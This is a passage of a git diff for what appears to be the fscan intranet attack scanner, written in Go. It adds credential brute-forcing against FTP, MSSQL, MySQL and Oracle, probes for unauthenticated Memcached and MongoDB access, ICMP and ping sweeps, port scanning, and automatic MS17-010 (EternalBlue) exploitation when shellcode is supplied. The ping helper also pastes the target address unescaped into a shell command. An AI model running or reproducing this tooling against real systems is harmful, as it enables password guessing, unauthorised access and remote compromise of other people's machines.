 func FtpScan(info *common.HostInfo) (tmperr error) {
+	if common.IsBrute {
+		return
+	}
+	starttime := time.Now().Unix()
+	flag, err := FtpConn(info, "anonymous", "")
+	if flag == true && err == nil {
+		return err
+	} else {
+		errlog := fmt.Sprintf("[-] ftp://%v:%v %v %v", info.Host, info.Ports, "anonymous", err)
+		common.LogError(errlog)
+		tmperr = err
+		if common.CheckErrs(err) {
+			return err
+		}
+	}
+
 	for _, user := range common.Userdict["ftp"] {
 		for _, pass := range common.Passwords {
 			pass = strings.Replace(pass, "{user}", user, -1)
@@ -16,9 +32,15 @@ func FtpScan(info *common.HostInfo) (tmperr error) {
 			if flag == true && err == nil {
 				return err
 			} else {
-				errlog := fmt.Sprintf("[-] ftp %v %v %v %v %v", info.Host, common.PORTList["ftp"], user, pass, err)
+				errlog := fmt.Sprintf("[-] ftp://%v:%v %v %v %v", info.Host, info.Ports, user, pass, err)
 				common.LogError(errlog)
 				tmperr = err
+				if common.CheckErrs(err) {
+					return err
+				}
+				if time.Now().Unix()-starttime > (int64(len(common.Userdict["ftp"])*len(common.Passwords)) * common.Timeout) {
+					return err
+				}
 			}
 		}
 	}
@@ -27,13 +49,13 @@ func FtpScan(info *common.HostInfo) (tmperr error) {

 func FtpConn(info *common.HostInfo, user string, pass string) (flag bool, err error) {
 	flag = false
-	Host, Port, Username, Password := info.Host, common.PORTList["ftp"], user, pass
-	conn, err := ftp.DialTimeout(fmt.Sprintf("%v:%v", Host, Port), time.Duration(info.Timeout)*time.Second)
+	Host, Port, Username, Password := info.Host, info.Ports, user, pass
+	conn, err := ftp.DialTimeout(fmt.Sprintf("%v:%v", Host, Port), time.Duration(common.Timeout)*time.Second)
 	if err == nil {
 		err = conn.Login(Username, Password)
 		if err == nil {
 			flag = true
-			result := fmt.Sprintf("FTP:%v:%v:%v %v", Host, Port, Username, Password)
+			result := fmt.Sprintf("[+] ftp://%v:%v:%v %v", Host, Port, Username, Password)
 			dirs, err := conn.List("")
 			//defer conn.Logout()
 			if err == nil {
--- a/Plugins/icmp.go
+++ b/Plugins/icmp.go
@@ -3,62 +3,95 @@ package Plugins
 import (
 	"bytes"
 	"fmt"
+	"github.com/shadow1ng/fscan/common"
 	"golang.org/x/net/icmp"
-	"log"
 	"net"
-	"os"
 	"os/exec"
-	"os/user"
 	"runtime"
 	"strings"
 	"sync"
 	"time"
 )

-var AliveHosts []string
+var (
+	AliveHosts []string
+	OS         = runtime.GOOS
+	ExistHosts = make(map[string]struct{})
+	livewg     sync.WaitGroup
+)

-var SysInfo = GetSys()
+func CheckLive(hostslist []string, Ping bool) []string {
+	chanHosts := make(chan string, len(hostslist))
+	go func() {
+		for ip := range chanHosts {
+			if _, ok := ExistHosts[ip]; !ok && IsContain(hostslist, ip) {
+				ExistHosts[ip] = struct{}{}
+				if common.Silent == false {
+					if Ping == false {
+						fmt.Printf("(icmp) Target %-15s is alive\n", ip)
+					} else {
+						fmt.Printf("(ping) Target %-15s is alive\n", ip)
+					}
+				}
+				AliveHosts = append(AliveHosts, ip)
+			}
+			livewg.Done()
+		}
+	}()

-type SystemInfo struct {
-	OS       string
-	HostName string
-	Groupid  string
-	Userid   string
-	Username string
-}
-
-func GetSys() SystemInfo {
-	var sysinfo SystemInfo
-
-	sysinfo.OS = runtime.GOOS
-	name, err := os.Hostname()
-	if err == nil {
-		sysinfo.HostName = name
+	if Ping == true {
+		//使用ping探测
+		RunPing(hostslist, chanHosts)
 	} else {
-		name = "none"
+		//优先尝试监听本地icmp,批量探测
+		conn, err := icmp.ListenPacket("ip4:icmp", "0.0.0.0")
+		if err == nil {
+			RunIcmp1(hostslist, conn, chanHosts)
+		} else {
+			common.LogError(err)
+			//尝试无监听icmp探测
+			fmt.Println("trying RunIcmp2")
+			conn, err := net.DialTimeout("ip4:icmp", "127.0.0.1", 3*time.Second)
+			defer func() {
+				if conn != nil {
+					conn.Close()
+				}
+			}()
+			if err == nil {
+				RunIcmp2(hostslist, chanHosts)
+			} else {
+				common.LogError(err)
+				//使用ping探测
+				fmt.Println("The current user permissions unable to send icmp packets")
+				fmt.Println("start ping")
+				RunPing(hostslist, chanHosts)
+			}
+		}
 	}

-	u, err := user.Current()
-	if err == nil {
-		sysinfo.Groupid = u.Gid
-		sysinfo.Userid = u.Uid
-		sysinfo.Username = u.Username
-	} else {
-		sysinfo.Groupid = "1"
-		sysinfo.Userid = "1"
-		sysinfo.Username = name
+	livewg.Wait()
+	close(chanHosts)
+
+	if len(hostslist) > 1000 {
+		arrTop, arrLen := ArrayCountValueTop(AliveHosts, common.LiveTop, true)
+		for i := 0; i < len(arrTop); i++ {
+			output := fmt.Sprintf("[*] LiveTop %-16s 段存活数量为: %d", arrTop[i]+".0.0/16", arrLen[i])
+			common.LogSuccess(output)
+		}
+	}
+	if len(hostslist) > 256 {
+		arrTop, arrLen := ArrayCountValueTop(AliveHosts, common.LiveTop, false)
+		for i := 0; i < len(arrTop); i++ {
+			output := fmt.Sprintf("[*] LiveTop %-16s 段存活数量为: %d", arrTop[i]+".0/24", arrLen[i])
+			common.LogSuccess(output)
+		}
 	}

-	return sysinfo
+	return AliveHosts
 }

-func IcmpCheck(hostslist []string) {
-	conn, err := icmp.ListenPacket("ip4:icmp", "0.0.0.0")
+func RunIcmp1(hostslist []string, conn *icmp.PacketConn, chanHosts chan string) {
 	endflag := false
-	if err != nil {
-		log.Fatal(err)
-	}
-	var chanHosts = make(chan string)
 	go func() {
 		for {
 			if endflag == true {
@@ -67,46 +100,118 @@ func IcmpCheck(hostslist []string) {
 			msg := make([]byte, 100)
 			_, sourceIP, _ := conn.ReadFrom(msg)
 			if sourceIP != nil {
+				livewg.Add(1)
 				chanHosts <- sourceIP.String()
 			}
 		}
 	}()

-	go func() {
-		for ip := range chanHosts {
-			if !IsContain(AliveHosts, ip) {
-				fmt.Printf("(icmp) Target '%s' is alive\n", ip)
-				AliveHosts = append(AliveHosts, ip)
-			}
-		}
-	}()
-
 	for _, host := range hostslist {
-		write(host, conn)
+		dst, _ := net.ResolveIPAddr("ip", host)
+		IcmpByte := makemsg(host)
+		conn.WriteTo(IcmpByte, dst)
 	}
-	if len(hostslist) > 10 {
-		time.Sleep(6 * time.Second)
-	} else {
-		time.Sleep(3 * time.Second)
+	//根据hosts数量修改icmp监听时间
+	start := time.Now()
+	for {
+		if len(AliveHosts) == len(hostslist) {
+			break
+		}
+		since := time.Now().Sub(start)
+		var wait time.Duration
+		switch {
+		case len(hostslist) <= 256:
+			wait = time.Second * 3
+		default:
+			wait = time.Second * 6
+		}
+		if since > wait {
+			break
+		}
 	}
 	endflag = true
-	close(chanHosts)
 	conn.Close()
 }

-func write(ip string, conn *icmp.PacketConn) {
-	dst, _ := net.ResolveIPAddr("ip", ip)
-	IcmpByte := []byte{8, 0, 247, 255, 0, 0, 0, 0}
-	conn.WriteTo(IcmpByte, dst)
+func RunIcmp2(hostslist []string, chanHosts chan string) {
+	num := 1000
+	if len(hostslist) < num {
+		num = len(hostslist)
+	}
+	var wg sync.WaitGroup
+	limiter := make(chan struct{}, num)
+	for _, host := range hostslist {
+		wg.Add(1)
+		limiter <- struct{}{}
+		go func(host string) {
+			if icmpalive(host) {
+				livewg.Add(1)
+				chanHosts <- host
+			}
+			<-limiter
+			wg.Done()
+		}(host)
+	}
+	wg.Wait()
+	close(limiter)
+}
+
+func icmpalive(host string) bool {
+	startTime := time.Now()
+	conn, err := net.DialTimeout("ip4:icmp", host, 6*time.Second)
+	defer func() {
+		if conn != nil {
+			conn.Close()
+		}
+	}()
+	if err != nil {
+		return false
+	}
+	if err := conn.SetDeadline(startTime.Add(6 * time.Second)); err != nil {
+		return false
+	}
+	msg := makemsg(host)
+	if _, err := conn.Write(msg); err != nil {
+		return false
+	}
+
+	receive := make([]byte, 60)
+	if _, err := conn.Read(receive); err != nil {
+		return false
+	}
+
+	return true
+}
+
+func RunPing(hostslist []string, chanHosts chan string) {
+	var bsenv = ""
+	if OS != "windows" {
+		bsenv = "/bin/bash"
+	}
+	var wg sync.WaitGroup
+	limiter := make(chan struct{}, 50)
+	for _, host := range hostslist {
+		wg.Add(1)
+		limiter <- struct{}{}
+		go func(host string) {
+			if ExecCommandPing(host, bsenv) {
+				livewg.Add(1)
+				chanHosts <- host
+			}
+			<-limiter
+			wg.Done()
+		}(host)
+	}
+	wg.Wait()
 }

 func ExecCommandPing(ip string, bsenv string) bool {
 	var command *exec.Cmd
-	if SysInfo.OS == "windows" {
+	if OS == "windows" {
 		command = exec.Command("cmd", "/c", "ping -n 1 -w 1 "+ip+" && echo true || echo false") //ping -c 1 -i 0.5 -t 4 -W 2 -w 5 "+ip+" >/dev/null && echo true || echo false"
-	} else if SysInfo.OS == "linux" {
+	} else if OS == "linux" {
 		command = exec.Command(bsenv, "-c", "ping -c 1 -w 1 "+ip+" >/dev/null && echo true || echo false") //ping -c 1 -i 0.5 -t 4 -W 2 -w 5 "+ip+" >/dev/null && echo true || echo false"
-	} else if SysInfo.OS == "darwin" {
+	} else if OS == "darwin" {
 		command = exec.Command(bsenv, "-c", "ping -c 1 -W 1 "+ip+" >/dev/null && echo true || echo false") //ping -c 1 -i 0.5 -t 4 -W 2 -w 5 "+ip+" >/dev/null && echo true || echo false"
 	}
 	outinfo := bytes.Buffer{}
@@ -126,57 +231,88 @@ func ExecCommandPing(ip string, bsenv string) bool {
 	}
 }

-func PingCMDcheck(hostslist []string, bsenv string) {
-	var wg sync.WaitGroup
-	mutex := &sync.Mutex{}
-	limiter := make(chan struct{}, 50)
-	for _, host := range hostslist {
-		wg.Add(1)
-		limiter <- struct{}{}
-		go func(host string) {
-			defer wg.Done()
-			if ExecCommandPing(host, bsenv) {
-				mutex.Lock()
-				fmt.Printf("(Ping) Target '%s' is alive\n", host)
-				AliveHosts = append(AliveHosts, host)
-				mutex.Unlock()
-			}
-			<-limiter
-		}(host)
-	}
-	wg.Wait()
+func makemsg(host string) []byte {
+	msg := make([]byte, 40)
+	id0, id1 := genIdentifier(host)
+	msg[0] = 8
+	msg[1] = 0
+	msg[2] = 0
+	msg[3] = 0
+	msg[4], msg[5] = id0, id1
+	msg[6], msg[7] = genSequence(1)
+	check := checkSum(msg[0:40])
+	msg[2] = byte(check >> 8)
+	msg[3] = byte(check & 255)
+	return msg
 }
-func ICMPRun(hostslist []string, Ping bool) []string {
-	if SysInfo.OS == "windows" {
-		if Ping == false {
-			IcmpCheck(hostslist)
-		} else {
-			PingCMDcheck(hostslist, "")
-		}
-	} else if SysInfo.OS == "linux" {
-		if SysInfo.Groupid == "0" || SysInfo.Userid == "0" || SysInfo.Username == "root" {
-			if Ping == false {
-				IcmpCheck(hostslist)
+
+func checkSum(msg []byte) uint16 {
+	sum := 0
+	length := len(msg)
+	for i := 0; i < length-1; i += 2 {
+		sum += int(msg[i])*256 + int(msg[i+1])
+	}
+	if length%2 == 1 {
+		sum += int(msg[length-1]) * 256
+	}
+	sum = (sum >> 16) + (sum & 0xffff)
+	sum = sum + (sum >> 16)
+	answer := uint16(^sum)
+	return answer
+}
+
+func genSequence(v int16) (byte, byte) {
+	ret1 := byte(v >> 8)
+	ret2 := byte(v & 255)
+	return ret1, ret2
+}
+
+func genIdentifier(host string) (byte, byte) {
+	return host[0], host[1]
+}
+
+func ArrayCountValueTop(arrInit []string, length int, flag bool) (arrTop []string, arrLen []int) {
+	if len(arrInit) == 0 {
+		return
+	}
+	arrMap1 := make(map[string]int)
+	arrMap2 := make(map[string]int)
+	for _, value := range arrInit {
+		line := strings.Split(value, ".")
+		if len(line) == 4 {
+			if flag {
+				value = fmt.Sprintf("%s.%s", line[0], line[1])
 			} else {
-				PingCMDcheck(hostslist, "/bin/bash")
+				value = fmt.Sprintf("%s.%s.%s", line[0], line[1], line[2])
 			}
-		} else {
-			fmt.Println("The current user permissions unable to send icmp packets")
-			fmt.Println("start ping")
-			PingCMDcheck(hostslist, "/bin/bash")
 		}
-	} else if SysInfo.OS == "darwin" {
-		if SysInfo.Groupid == "0" || SysInfo.Userid == "0" || SysInfo.Username == "root" {
-			if Ping == false {
-				IcmpCheck(hostslist)
-			} else {
-				PingCMDcheck(hostslist, "/bin/bash")
-			}
+		if arrMap1[value] != 0 {
+			arrMap1[value]++
 		} else {
-			fmt.Println("The current user permissions unable to send icmp packets")
-			fmt.Println("start ping")
-			PingCMDcheck(hostslist, "/bin/bash")
+			arrMap1[value] = 1
 		}
 	}
-	return AliveHosts
+	for k, v := range arrMap1 {
+		arrMap2[k] = v
+	}
+
+	i := 0
+	for _ = range arrMap1 {
+		var maxCountKey string
+		var maxCountVal = 0
+		for key, val := range arrMap2 {
+			if val > maxCountVal {
+				maxCountVal = val
+				maxCountKey = key
+			}
+		}
+		arrTop = append(arrTop, maxCountKey)
+		arrLen = append(arrLen, maxCountVal)
+		i++
+		if i >= length {
+			return
+		}
+		delete(arrMap2, maxCountKey)
+	}
+	return
 }
--- a/Plugins/memcached.go
+++ b/Plugins/memcached.go
@@ -3,26 +3,36 @@ package Plugins
 import (
 	"fmt"
 	"github.com/shadow1ng/fscan/common"
-	"net"
 	"strings"
 	"time"
 )

-func MemcachedScan(info *common.HostInfo) (err error, result string) {
-	realhost := fmt.Sprintf("%s:%d", info.Host, common.PORTList["mem"])
-	client, err := net.DialTimeout("tcp", realhost, time.Duration(info.Timeout)*time.Second)
+func MemcachedScan(info *common.HostInfo) (err error) {
+	realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports)
+	client, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(common.Timeout)*time.Second)
+	defer func() {
+		if client != nil {
+			client.Close()
+		}
+	}()
 	if err == nil {
-		client.SetDeadline(time.Now().Add(time.Duration(info.Timeout) * time.Second))
-		client.Write([]byte("stats\n")) //Set the key randomly to prevent the key on the server from being overwritten
-		rev := make([]byte, 1024)
-		n, err := client.Read(rev)
+		err = client.SetDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second))
 		if err == nil {
-			if strings.Contains(string(rev[:n]), "STAT") {
-				defer client.Close()
-				result = fmt.Sprintf("Memcached:%s unauthorized", realhost)
-				common.LogSuccess(result)
+			_, err = client.Write([]byte("stats\n")) //Set the key randomly to prevent the key on the server from being overwritten
+			if err == nil {
+				rev := make([]byte, 1024)
+				n, err := client.Read(rev)
+				if err == nil {
+					if strings.Contains(string(rev[:n]), "STAT") {
+						result := fmt.Sprintf("[+] Memcached %s unauthorized", realhost)
+						common.LogSuccess(result)
+					}
+				} else {
+					errlog := fmt.Sprintf("[-] Memcached %v:%v %v", info.Host, info.Ports, err)
+					common.LogError(errlog)
+				}
 			}
 		}
 	}
-	return err, result
+	return err
 }
--- a/Plugins/mongodb.go
+++ b/Plugins/mongodb.go
@@ -4,26 +4,39 @@ import (
 	"fmt"
 	_ "github.com/denisenkom/go-mssqldb"
 	"github.com/shadow1ng/fscan/common"
-	"net"
 	"strings"
 	"time"
 )

 func MongodbScan(info *common.HostInfo) error {
+	if common.IsBrute {
+		return nil
+	}
 	_, err := MongodbUnauth(info)
+	if err != nil {
+		errlog := fmt.Sprintf("[-] Mongodb %v:%v %v", info.Host, info.Ports, err)
+		common.LogError(errlog)
+	}
 	return err
 }

 func MongodbUnauth(info *common.HostInfo) (flag bool, err error) {
 	flag = false
-	senddata := []byte{58, 0, 0, 0, 167, 65, 0, 0, 0, 0, 0, 0, 212, 7, 0, 0, 0, 0, 0, 0, 97, 100, 109, 105, 110, 46, 36, 99, 109, 100, 0, 0, 0, 0, 0, 255, 255, 255, 255, 19, 0, 0, 0, 16, 105, 115, 109, 97, 115, 116, 101, 114, 0, 1, 0, 0, 0, 0}
-	getlogdata := []byte{72, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 212, 7, 0, 0, 0, 0, 0, 0, 97, 100, 109, 105, 110, 46, 36, 99, 109, 100, 0, 0, 0, 0, 0, 1, 0, 0, 0, 33, 0, 0, 0, 2, 103, 101, 116, 76, 111, 103, 0, 16, 0, 0, 0, 115, 116, 97, 114, 116, 117, 112, 87, 97, 114, 110, 105, 110, 103, 115, 0, 0}
-	realhost := fmt.Sprintf("%s:%d", info.Host, common.PORTList["mgo"])
-	conn, err := net.DialTimeout("tcp", realhost, time.Duration(info.Timeout)*time.Second)
+	senddata := []byte{72, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 212, 7, 0, 0, 0, 0, 0, 0, 97, 100, 109, 105, 110, 46, 36, 99, 109, 100, 0, 0, 0, 0, 0, 1, 0, 0, 0, 33, 0, 0, 0, 2, 103, 101, 116, 76, 111, 103, 0, 16, 0, 0, 0, 115, 116, 97, 114, 116, 117, 112, 87, 97, 114, 110, 105, 110, 103, 115, 0, 0}
+	realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports)
+	conn, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(common.Timeout)*time.Second)
+	defer func() {
+		if conn != nil {
+			conn.Close()
+		}
+	}()
+	if err != nil {
+		return flag, err
+	}
+	err = conn.SetReadDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second))
 	if err != nil {
 		return flag, err
 	}
-	defer conn.Close()
 	_, err = conn.Write(senddata)
 	if err != nil {
 		return flag, err
@@ -34,21 +47,10 @@ func MongodbUnauth(info *common.HostInfo) (flag bool, err error) {
 		return flag, err
 	}
 	text := string(buf[0:count])
-	if strings.Contains(text, "ismaster") {
-		_, err = conn.Write(getlogdata)
-		if err != nil {
-			return flag, err
-		}
-		count, err := conn.Read(buf)
-		if err != nil {
-			return flag, err
-		}
-		text := string(buf[0:count])
-		if strings.Contains(text, "totalLinesWritten") {
-			flag = true
-			result := fmt.Sprintf("Mongodb:%v unauthorized", realhost)
-			common.LogSuccess(result)
-		}
+	if strings.Contains(text, "totalLinesWritten") {
+		flag = true
+		result := fmt.Sprintf("[+] Mongodb:%v unauthorized", realhost)
+		common.LogSuccess(result)
 	}
 	return flag, err
 }
--- a/Plugins/ms17010-exp.go
+++ b/Plugins/ms17010-exp.go
--- a/Plugins/ms17010.go
+++ b/Plugins/ms17010.go
@@ -6,7 +6,6 @@ import (
 	"errors"
 	"fmt"
 	"github.com/shadow1ng/fscan/common"
-	"net"
 	"strings"
 	"time"
 )
@@ -20,21 +19,31 @@ var (
 )

 func MS17010(info *common.HostInfo) error {
+	if common.IsBrute {
+		return nil
+	}
 	err := MS17010Scan(info)
+	if err != nil {
+		errlog := fmt.Sprintf("[-] Ms17010 %v %v", info.Host, err)
+		common.LogError(errlog)
+	}
 	return err
 }

 func MS17010Scan(info *common.HostInfo) error {
-
 	ip := info.Host
 	// connecting to a host in LAN if reachable should be very quick
-	conn, err := net.DialTimeout("tcp", ip+":445", time.Duration(info.Timeout)*time.Second)
+	conn, err := common.WrapperTcpWithTimeout("tcp", ip+":445", time.Duration(common.Timeout)*time.Second)
+	defer func() {
+		if conn != nil {
+			conn.Close()
+		}
+	}()
 	if err != nil {
 		//fmt.Printf("failed to connect to %s\n", ip)
 		return err
 	}
-	defer conn.Close()
-	err = conn.SetDeadline(time.Now().Add(time.Duration(info.Timeout) * time.Second))
+	err = conn.SetDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second))
 	if err != nil {
 		//fmt.Printf("failed to connect to %s\n", ip)
 		return err
@@ -77,7 +86,7 @@ func MS17010Scan(info *common.HostInfo) error {
 		// find byte count
 		byteCount := binary.LittleEndian.Uint16(sessionSetupResponse[7:9])
 		if n != int(byteCount)+45 {
-			fmt.Println("invalid session setup AndX response")
+			fmt.Println("[-]", ip+":445", "ms17010 invalid session setup AndX response")
 		} else {
 			// two continous null bytes indicates end of a unicode string
 			for i := 10; i < len(sessionSetupResponse)-1; i++ {
@@ -122,6 +131,11 @@ func MS17010Scan(info *common.HostInfo) error {
 		//} else{fmt.Printf("\033[33m%s\tMS17-010\t(%s)\033[0m\n", ip, os)}
 		result := fmt.Sprintf("[+] %s\tMS17-010\t(%s)", ip, os)
 		common.LogSuccess(result)
+		defer func() {
+			if common.SC != "" {
+				MS17010EXP(info)
+			}
+		}()
 		// detect present of DOUBLEPULSAR SMB implant
 		trans2SessionSetupRequest[28] = treeID[0]
 		trans2SessionSetupRequest[29] = treeID[1]
@@ -137,13 +151,12 @@ func MS17010Scan(info *common.HostInfo) error {
 		}

 		if reply[34] == 0x51 {
-			//fmt.Printf("DOUBLEPULSAR SMB IMPLANT in %s\n", ip)
-			result := fmt.Sprintf("DOUBLEPULSAR SMB IMPLANT in %s", ip)
+			result := fmt.Sprintf("[+] %s has DOUBLEPULSAR SMB IMPLANT", ip)
 			common.LogSuccess(result)
 		}

 	} else {
-		result := fmt.Sprintf("%s  (%s)", ip, os)
+		result := fmt.Sprintf("[*] %s  (%s)", ip, os)
 		common.LogSuccess(result)
 	}
 	return err
--- a/Plugins/mssql.go
+++ b/Plugins/mssql.go
@@ -10,6 +10,10 @@ import (
 )

 func MssqlScan(info *common.HostInfo) (tmperr error) {
+	if common.IsBrute {
+		return
+	}
+	starttime := time.Now().Unix()
 	for _, user := range common.Userdict["mssql"] {
 		for _, pass := range common.Passwords {
 			pass = strings.Replace(pass, "{user}", user, -1)
@@ -17,9 +21,15 @@ func MssqlScan(info *common.HostInfo) (tmperr error) {
 			if flag == true && err == nil {
 				return err
 			} else {
-				errlog := fmt.Sprintf("[-] mssql %v %v %v %v %v", info.Host, common.PORTList["mssql"], user, pass, err)
+				errlog := fmt.Sprintf("[-] mssql %v:%v %v %v %v", info.Host, info.Ports, user, pass, err)
 				common.LogError(errlog)
 				tmperr = err
+				if common.CheckErrs(err) {
+					return err
+				}
+				if time.Now().Unix()-starttime > (int64(len(common.Userdict["mssql"])*len(common.Passwords)) * common.Timeout) {
+					return err
+				}
 			}
 		}
 	}
@@ -28,12 +38,12 @@ func MssqlScan(info *common.HostInfo) (tmperr error) {

 func MssqlConn(info *common.HostInfo, user string, pass string) (flag bool, err error) {
 	flag = false
-	Host, Port, Username, Password := info.Host, common.PORTList["mssql"], user, pass
-	dataSourceName := fmt.Sprintf("server=%s;user id=%s;password=%s;port=%d;encrypt=disable;timeout=%d", Host, Username, Password, Port, time.Duration(info.Timeout)*time.Second)
+	Host, Port, Username, Password := info.Host, info.Ports, user, pass
+	dataSourceName := fmt.Sprintf("server=%s;user id=%s;password=%s;port=%v;encrypt=disable;timeout=%v", Host, Username, Password, Port, time.Duration(common.Timeout)*time.Second)
 	db, err := sql.Open("mssql", dataSourceName)
 	if err == nil {
-		db.SetConnMaxLifetime(time.Duration(info.Timeout) * time.Second)
-		db.SetConnMaxIdleTime(time.Duration(info.Timeout) * time.Second)
+		db.SetConnMaxLifetime(time.Duration(common.Timeout) * time.Second)
+		db.SetConnMaxIdleTime(time.Duration(common.Timeout) * time.Second)
 		db.SetMaxIdleConns(0)
 		defer db.Close()
 		err = db.Ping()
--- a/Plugins/mysql.go
+++ b/Plugins/mysql.go
@@ -10,6 +10,10 @@ import (
 )

 func MysqlScan(info *common.HostInfo) (tmperr error) {
+	if common.IsBrute {
+		return
+	}
+	starttime := time.Now().Unix()
 	for _, user := range common.Userdict["mysql"] {
 		for _, pass := range common.Passwords {
 			pass = strings.Replace(pass, "{user}", user, -1)
@@ -17,9 +21,15 @@ func MysqlScan(info *common.HostInfo) (tmperr error) {
 			if flag == true && err == nil {
 				return err
 			} else {
-				errlog := fmt.Sprintf("[-] mysql %v %v %v %v %v", info.Host, common.PORTList["mysql"], user, pass, err)
+				errlog := fmt.Sprintf("[-] mysql %v:%v %v %v %v", info.Host, info.Ports, user, pass, err)
 				common.LogError(errlog)
 				tmperr = err
+				if common.CheckErrs(err) {
+					return err
+				}
+				if time.Now().Unix()-starttime > (int64(len(common.Userdict["mysql"])*len(common.Passwords)) * common.Timeout) {
+					return err
+				}
 			}
 		}
 	}
@@ -28,12 +38,12 @@ func MysqlScan(info *common.HostInfo) (tmperr error) {

 func MysqlConn(info *common.HostInfo, user string, pass string) (flag bool, err error) {
 	flag = false
-	Host, Port, Username, Password := info.Host, common.PORTList["mysql"], user, pass
-	dataSourceName := fmt.Sprintf("%v:%v@tcp(%v:%v)/%v?charset=utf8", Username, Password, Host, Port, "mysql")
+	Host, Port, Username, Password := info.Host, info.Ports, user, pass
+	dataSourceName := fmt.Sprintf("%v:%v@tcp(%v:%v)/mysql?charset=utf8&timeout=%v", Username, Password, Host, Port, time.Duration(common.Timeout)*time.Second)
 	db, err := sql.Open("mysql", dataSourceName)
 	if err == nil {
-		db.SetConnMaxLifetime(time.Duration(info.Timeout) * time.Second)
-		db.SetConnMaxIdleTime(time.Duration(info.Timeout) * time.Second)
+		db.SetConnMaxLifetime(time.Duration(common.Timeout) * time.Second)
+		db.SetConnMaxIdleTime(time.Duration(common.Timeout) * time.Second)
 		db.SetMaxIdleConns(0)
 		defer db.Close()
 		err = db.Ping()
--- a/Plugins/oracle.go
+++ b/Plugins/oracle.go
@@ -0,0 +1,57 @@
+package Plugins
+
+import (
+	"database/sql"
+	"fmt"
+	"github.com/shadow1ng/fscan/common"
+	_ "github.com/sijms/go-ora/v2"
+	"strings"
+	"time"
+)
+
+func OracleScan(info *common.HostInfo) (tmperr error) {
+	if common.IsBrute {
+		return
+	}
+	starttime := time.Now().Unix()
+	for _, user := range common.Userdict["oracle"] {
+		for _, pass := range common.Passwords {
+			pass = strings.Replace(pass, "{user}", user, -1)
+			flag, err := OracleConn(info, user, pass)
+			if flag == true && err == nil {
+				return err
+			} else {
+				errlog := fmt.Sprintf("[-] oracle %v:%v %v %v %v", info.Host, info.Ports, user, pass, err)
+				common.LogError(errlog)
+				tmperr = err
+				if common.CheckErrs(err) {
+					return err
+				}
+				if time.Now().Unix()-starttime > (int64(len(common.Userdict["oracle"])*len(common.Passwords)) * common.Timeout) {
+					return err
+				}
+			}
+		}
+	}
+	return tmperr
+}
+
+func OracleConn(info *common.HostInfo, user string, pass string) (flag bool, err error) {
+	flag = false
+	Host, Port, Username, Password := info.Host, info.Ports, user, pass
+	dataSourceName := fmt.Sprintf("oracle://%s:%s@%s:%s/orcl", Username, Password, Host, Port)
+	db, err := sql.Open("oracle", dataSourceName)
+	if err == nil {
+		db.SetConnMaxLifetime(time.Duration(common.Timeout) * time.Second)
+		db.SetConnMaxIdleTime(time.Duration(common.Timeout) * time.Second)
+		db.SetMaxIdleConns(0)
+		defer db.Close()
+		err = db.Ping()
+		if err == nil {
+			result := fmt.Sprintf("[+] oracle:%v:%v:%v %v", Host, Port, Username, Password)
+			common.LogSuccess(result)
+			flag = true
+		}
+	}
+	return flag, err
+}
--- a/Plugins/portscan.go
+++ b/Plugins/portscan.go
@@ -3,99 +3,116 @@ package Plugins
 import (
 	"fmt"
 	"github.com/shadow1ng/fscan/common"
-	"net"
+	"sort"
 	"strconv"
 	"sync"
 	"time"
 )

-func ProbeHosts(host string, ports <-chan int, respondingHosts chan<- string, done chan<- bool, adjustedTimeout int64) {
-	for port := range ports {
-		con, err := net.DialTimeout("tcp4", fmt.Sprintf("%s:%d", host, port), time.Duration(adjustedTimeout)*time.Second)
-		if err == nil {
-			con.Close()
-			address := host + ":" + strconv.Itoa(port)
-			result := fmt.Sprintf("%s open", address)
-			common.LogSuccess(result)
-			respondingHosts <- address
-		}
-	}
-	done <- true
+type Addr struct {
+	ip   string
+	port int
 }

-func ScanAllports(address string, probePorts []int, threads int, adjustedTimeout int64) ([]string, error) {
-	ports := make(chan int, 20)
-	results := make(chan string)
-	done := make(chan bool, threads)
-
-	for worker := 0; worker < threads; worker++ {
-		go ProbeHosts(address, ports, results, done, adjustedTimeout)
-	}
-
-	for _, port := range probePorts {
-		ports <- port
-	}
-	close(ports)
-
-	var responses = []string{}
-	for {
-		select {
-		case found := <-results:
-			responses = append(responses, found)
-		case <-done:
-			threads--
-			if threads == 0 {
-				return responses, nil
-			}
-		}
-	}
-}
-
-func TCPportScan(hostslist []string, ports string, timeout int64) []string {
+func PortScan(hostslist []string, ports string, timeout int64) []string {
 	var AliveAddress []string
 	probePorts := common.ParsePort(ports)
-	lm := 20
-	if len(hostslist) > 5 && len(hostslist) <= 50 {
-		lm = 40
-	} else if len(hostslist) > 50 && len(hostslist) <= 100 {
-		lm = 50
-	} else if len(hostslist) > 100 && len(hostslist) <= 150 {
-		lm = 60
-	} else if len(hostslist) > 150 && len(hostslist) <= 200 {
-		lm = 70
-	} else if len(hostslist) > 200 {
-		lm = 75
-	}
+	noPorts := common.ParsePort(common.NoPorts)
+	if len(noPorts) > 0 {
+		temp := map[int]struct{}{}
+		for _, port := range probePorts {
+			temp[port] = struct{}{}
+		}

-	thread := 10
-	if len(probePorts) > 500 && len(probePorts) <= 4000 {
-		thread = len(probePorts) / 100
-	} else if len(probePorts) > 4000 && len(probePorts) <= 6000 {
-		thread = len(probePorts) / 200
-	} else if len(probePorts) > 6000 && len(probePorts) <= 10000 {
-		thread = len(probePorts) / 350
-	} else if len(probePorts) > 10000 && len(probePorts) < 50000 {
-		thread = len(probePorts) / 400
-	} else if len(probePorts) >= 50000 && len(probePorts) <= 65535 {
-		thread = len(probePorts) / 500
-	}
+		for _, port := range noPorts {
+			delete(temp, port)
+		}

+		var newDatas []int
+		for port, _ := range temp {
+			newDatas = append(newDatas, port)
+		}
+		probePorts = newDatas
+		sort.Ints(probePorts)
+	}
+	workers := common.Threads
+	Addrs := make(chan Addr, len(hostslist)*len(probePorts))
+	results := make(chan string, len(hostslist)*len(probePorts))
 	var wg sync.WaitGroup
-	mutex := &sync.Mutex{}
-	limiter := make(chan struct{}, lm)
-	for _, host := range hostslist {
-		wg.Add(1)
-		limiter <- struct{}{}
-		go func(host string) {
-			defer wg.Done()
-			if aliveAdd, err := ScanAllports(host, probePorts, thread, timeout); err == nil && len(aliveAdd) > 0 {
-				mutex.Lock()
